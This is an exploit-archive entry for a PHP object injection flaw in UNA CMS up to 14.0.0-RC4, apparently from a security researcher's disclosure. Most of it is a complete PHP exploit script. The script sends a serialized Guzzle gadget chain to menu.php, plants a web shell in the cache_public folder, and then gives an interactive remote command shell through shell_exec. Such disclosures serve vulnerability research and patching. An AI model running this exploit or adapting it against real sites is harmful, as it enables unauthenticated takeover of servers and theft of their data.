# Exploit Title: UNA CMS <= 14.0.0-RC4 (BxBaseMenuSetAclLevel.php) PHP Object Injection Vulnerability
# Author: Egidio Romano aka EgiX
# Software link.......: https://unacms.com


[-] Software Links:
https://unacms.com
https://github.com/unacms/una

[-] Affected Versions:
All versions from 9.0.0-RC1 to 14.0.0-RC4.

[-] Vulnerability Description:
The vulnerability is located in the
/template/scripts/BxBaseMenuSetAclLevel.php script. Specifically,
within the BxBaseMenuSetAclLevel::getCode() method. When calling this
method, user input passed through the "profile_id" POST parameter is
not properly sanitized before being used in a call to the
unserialize() PHP function. This can be exploited by remote,
unauthenticated attackers to inject arbitrary PHP objects into the
application scope, allowing them to perform a variety of attacks, such
as writing and executing arbitrary PHP code.

<?php

/*
    ------------------------------------------------------------------------------------
    UNA CMS <= 14.0.0-RC4 (BxBaseMenuSetAclLevel.php) PHP Object Injection Vulnerability
    ------------------------------------------------------------------------------------
    
    author..............: Egidio Romano aka EgiX
    mail................: n0b0d13s[at]gmail[dot]com
    software link.......: https://unacms.com
    
    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+
    
    [-] Vulnerability Description:
      
    The vulnerability is located in the /template/scripts/BxBaseMenuSetAclLevel.php script.
    Specifically, within the BxBaseMenuSetAclLevel::getCode() method. When calling this
    method, user input passed through the "profile_id" POST parameter is not properly
    sanitized before being used in a call to the unserialize() PHP function. This can be
    exploited by remote, unauthenticated attackers to inject arbitrary PHP objects into
    the application scope, allowing them to perform a variety of attacks, such as
    writing and executing arbitrary PHP code.
    
    [-] Original Advisory:

    https://karmainsecurity.com/KIS-2025-01
*/

set_time_limit(0);
error_reporting(E_ERROR);

print "\n+------------------------------------------------------------+";
print "\n| UNA CMS <= 14.0.0-RC4 PHP Object Injection Exploit by EgiX |";
print "\n+------------------------------------------------------------+\n";

if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");

if ($argc != 2)
{
	print "\nUsage......: php $argv[0] <URL>\n";
	print "\nExample....: php $argv[0] http://localhost/una/";
	print "\nExample....: php $argv[0] https://unacms.com/\n\n";
	die();
}

define('ON_APACHE', true);
define('SH_PATH', ON_APACHE ? './cache_public/sh.phtml' : './cache_public/sh.php');

class GuzzleHttp_Cookie_SetCookie
{
	private $data = ['Expires' => '', 'Value' => '<?php eval(base64_decode($_SERVER[\'HTTP_C\'])); ?>'];
}

class GuzzleHttp_Cookie_FileCookieJar
{
	private $cookies, $filename = SH_PATH, $storeSessionCookies = true;
	
	function __construct()
	{
		$this->cookies = [new GuzzleHttp_Cookie_SetCookie];
	}
}

$url = $argv[1];
$ch  = curl_init();

$chain = serialize(new GuzzleHttp_Cookie_FileCookieJar);
$chain = str_replace('GuzzleHttp_Cookie_SetCookie', 'GuzzleHttp\Cookie\SetCookie', $chain);
$chain = str_replace('GuzzleHttp_Cookie_FileCookieJar', 'GuzzleHttp\Cookie\FileCookieJar', $chain);

curl_setopt($ch, CURLOPT_URL, "{$url}menu.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_HTTPHEADER, ["X-Requested-With: XMLHttpRequest"]);
curl_setopt($ch, CURLOPT_POSTFIELDS, "o=sys_set_acl_level&a=SetAclLevel&level_id=1&profile_id=" . urlencode($chain));

print "\n[+] Performing PHP Object Injection";

curl_exec($ch); curl_close($ch);

print "\n[+] Launching shell\n";

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url . SH_PATH);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);

$phpcode = "print '____'; print shell_exec(base64_decode('%s')); print '____';";

while(1)
{
	print "\nuna-shell# ";
	if (($cmd = trim(fgets(STDIN))) == "exit") break;
	curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
	preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}